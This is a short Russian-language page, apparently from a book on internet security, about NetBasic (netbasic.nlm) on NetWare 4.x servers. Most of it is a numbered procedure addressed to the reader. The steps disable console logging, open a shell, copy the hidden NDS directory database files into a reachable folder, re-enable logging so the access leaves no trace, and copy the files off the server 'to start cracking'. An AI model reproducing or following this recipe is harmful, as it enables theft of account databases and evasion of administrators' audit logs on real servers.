Защита информации в Интернет

         

Netbasic nlm (SYS SYSTEM)



netbasic. nlm (SYS: SYSTEM)

Набор средств разработки программного обеспечения NetBasic представляет собой язык сценариев, который изначально был разработан компанией High Technology Software Corp. (для краткости HiTecSoft). С его помощью можно конвертировать сценарии NetBasic в формат NLM (NetWare Loadable Module) компании Novell и использовать их на Web-сервере системы NetWare. Компонент netbasic.nlm имеет уникальную особенность, которая изначально была обнаружена взломщиками: с его помощью из командной строки можно про смотреть весь том, включая скрытый каталог _netware.
Средства NetBasic по умолчанию устанавливаются на всех серверах NetWare 4.x, так что их очень часто используют для получения доступа к файлам NDS. Для этого выполните следующую последовательность действий и команд.
1. С помощью команды SYS: \PUBLlc\rconsole получите доступ к консоли rconsole.
2. unload conlog (удаляет утилиту, регистрирующую консольные сообщения, и отключает режим регистрации).
3. load netbasic.nlm.
4. shell.
5. cd \_netware (скрытый системный каталог, который можно увидеть только с системной консоли).
6. md \login\nds.
7. copy block.nds \login\nds\block.nds.
8. copy entry.nds \login\nds\entry.nds.
9. copy partitio.nds \login\nds\partitio.nds.
10. copy value.nds \login\nds\value.nds.
11. exit (выход из оболочки).
12. unload netbasic.
13. load conlog (вновь загружаем утилиту регистрации).
14. Со стороны клиента воспользуйтесь командой mар, чтобы подключить сетевой диск, указав путь к созданному ранее каталогу LOGINXNDS.
15. Скопируйте файлы * .NDS на свой локальный компьютер.
16. Приступайте к взлому.



Содержание раздела